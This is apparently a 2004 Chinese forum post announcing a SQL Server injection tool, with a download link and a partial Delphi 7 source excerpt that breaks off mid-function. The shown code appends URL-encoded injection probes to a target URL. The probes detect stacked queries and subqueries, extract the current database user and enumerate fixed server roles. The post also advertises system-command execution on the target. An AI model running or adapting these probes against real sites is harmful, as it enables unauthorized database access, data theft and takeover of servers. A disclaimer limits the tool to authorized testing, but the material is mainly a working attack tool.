SQL Server注入工具 1.0
利用SQL Server的注入漏洞(将SQL片段拼接到目标URL的查询串后以HTTP请求发送)实现猜解数据库名、表名、字段名及记录信息;由于网速的原因,目前限制了只能同时猜解前5个字段值的记录信息。另外实现了三种方式执行系统命令,同时可回显显示。
本程序只供在获得授权的测试研究环境中使用,由此软件造成的后果一概不负责任;由于编写比较仓促,代码难免有纰漏之处,欢迎大家批评指正。
下载地址:http://free.efile.com.cn/hnxyy/NBSI.exe
作者:Hnxyy QQ:19026695
2004.12.16 北京
FireFox技术交流论坛
http://www.wrsky.com
临时访问地址
http://firefoxer.nease.net
It is all beginnings free
It is all ruin to be privately owned
D7源代码(Delphi 7,以下为单元 untmain.pas):
unit untmain;
interface
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, StdCtrls, idHttp, IdBaseComponent, IdComponent, IdTCPConnection,
IdTCPClient, OleCtrls, SHDocVw,mshtml;
type
TForm1 = class(TForm)
  // Main (and only) form of the tool.
  //
  // BtnCheckClick (in the implementation section) reads the target URL from
  // EdtUrl, appends URL-encoded SQL fragments to it, sends the result over
  // HTTP and fills the GroupBox1 edits with what the responses reveal. The
  // remaining handlers start/stop/cancel that work and drive the
  // command-execution options in GroupBox2.
  //
  // NOTE(review): every probe travels in the request URL (query string), so
  // the injected SQL is visible to the target web server, any proxy in the
  // path and, typically, their access logs. Use only against systems you are
  // authorized to test.
  Label1: TLabel;
  EdtUrl: TEdit;            // target URL; BtnCheckClick trims it and appends each probe to it
  BtnCheck: TButton;        // starts the probe sequence (BtnCheckClick)
  Label2: TLabel;
  GroupBox1: TGroupBox;     // probe results
  Label7: TLabel;
  Label3: TLabel;
  Label4: TLabel;
  Label5: TLabel;
  Label6: TLabel;
  EdtMuliCase: TEdit;       // whether stacked (multi-statement) queries are accepted
  EdtQuery: TEdit;          // whether subqueries are accepted
  EdtUser: TEdit;           // current database user as read back by GetWBMsg
  EdtPower: TEdit;          // fixed server roles the login holds, '|'-separated, or an "unknown" marker
  EdtDbName: TEdit;         // cleared at the start of each check; where it is filled is not in this excerpt
  Memo1: TMemo;             // cleared at the start of each check; presumably enumeration output - confirm
  GroupBox2: TGroupBox;     // system-command execution
  cbDisp: TCheckBox;        // presumably toggles echoing of command output (see README) - confirm
  EdtCommand: TEdit;        // command text to run
  rbCmd: TRadioButton;      // one of three mutually exclusive execution methods (with rbOA, rbJob)
  rbOA: TRadioButton;
  BtnExecute: TButton;      // runs the command (BtnExecuteClick)
  GroupBox3: TGroupBox;
  Memo2: TMemo;
  wb: TWebBrowser;          // embedded browser; wbDocumentComplete fires when a page it loads finishes
  BtnStop: TButton;
  rbJob: TRadioButton;      // third execution method, see rbCmd
  BtnCancel: TButton;
  procedure BtnCheckClick(Sender: TObject);
  procedure BtnExecuteClick(Sender: TObject);
  procedure wbDocumentComplete(Sender: TObject; const pDisp: IDispatch;
    var URL: OleVariant);
  procedure BtnStopClick(Sender: TObject);
  procedure rbCmdClick(Sender: TObject);
  procedure rbOAClick(Sender: TObject);
  procedure rbJobClick(Sender: TObject);
  procedure FormShow(Sender: TObject);
  procedure BtnCancelClick(Sender: TObject);
private
  { Private declarations }
  tag:integer;                     // purpose not visible in this excerpt
  isFinish,isCancel:boolean;       // isFinish is reset to False when a check starts; isCancel presumably set by BtnCancelClick - confirm
  // Sends URL and returns a boolean that BtnCheckClick treats as "the injected
  // condition held" (e.g. stacked query accepted). How it decides is not shown here.
  function Get(URL: string): boolean;
  // Fetches URL and returns a string; BtnCheckClick uses it to read the
  // current user name out of the response. Presumably goes through wb - confirm.
  function GetWBMsg(URL: string): string;
  Function StrToNChar(DbName,TName:string): string;   // not called in this excerpt
  procedure SetRdbCheck(rd:TRadioButton);             // not called in this excerpt; presumably selects one of rbCmd/rbOA/rbJob - confirm
public
  { Public declarations }
end;
var
  // Global form instance; not referenced by the code visible in this excerpt
  // (presumably created by the project file's Application.CreateForm - confirm).
  Form1: TForm1;
implementation
{$R *.dfm}
procedure TForm1.BtnCheckClick(Sender: TObject);
const
vFieldCount=5;
PowerStr :array[0..6] of string=(
'sysadmin','dbcreator','diskadmin',
'processadmin','serveradmin',
'setupadmin','securityadmin');
var
Url,DbName,TName,TName0,ColName,ColName0,NCharStr:string;
i,j,k,iCount:integer;
VerStr,ValueStr,CountStr,Powers:string;
FieldStr,FieldOrdStr,CFieldStr:string;
vfield:OleVariant;
begin
try
EdtMuliCase.Text :=';
EdtQuery.Text :=';
EdtUser.Text :=';
EdtPower.Text :=';
EdtDbName.Text :=';
Url:=trim(EdtUrl.Text);
isFinish :=False;
vfield :=VarArrayCreate([0,vFieldCount-1],varVariant);
Memo1.Clear;
Screen.Cursor :=crHourGlass;
//判断是否支持多句查询
if Get(Url+';declare%20@a%20int--') then
begin
EdtMuliCase.Text :='支持';
end else
begin
EdtMuliCase.Text :='不支持';
end;
//判断是否支持子查询
if get(Url+'%20and%20(Select%20count(1)%20from%20[sysobjects])>=0') then
begin
EdtQuery.Text :='支持';
end else
begin
EdtQuery.Text :='不支持';
end;
//取得当前用户
EdtUser.Text :=GetWBMsg(Url+'%20and%20char(124)%2Buser%2Bchar(124)=0');
//取得当前用户登录的服务器角色成员
for i:=0 to High(PowerStr) do
begin
if get(Url+'%20And%20Cast(IS_SRVROLEMEMBER(''+PowerStr[i]+'')%20as%20varchar(1))=1') then
begin
Powers :=Powers+PowerStr[i]+'|';
end;
end;
if Powers=' then
EdtPower.Text :='未知'
else EdtPower.Text :=Powers;
//指明当前用户是否为 db_owner 固定数据库角色的成员
{ if get(Url+'%20And%20Cast(IS_MEMBER('db_owner')%20as%20varchar(1))=1') then
begin
EdtPower.Text :='db_owner';
end else
begin
EdtPower.Text :='未知';






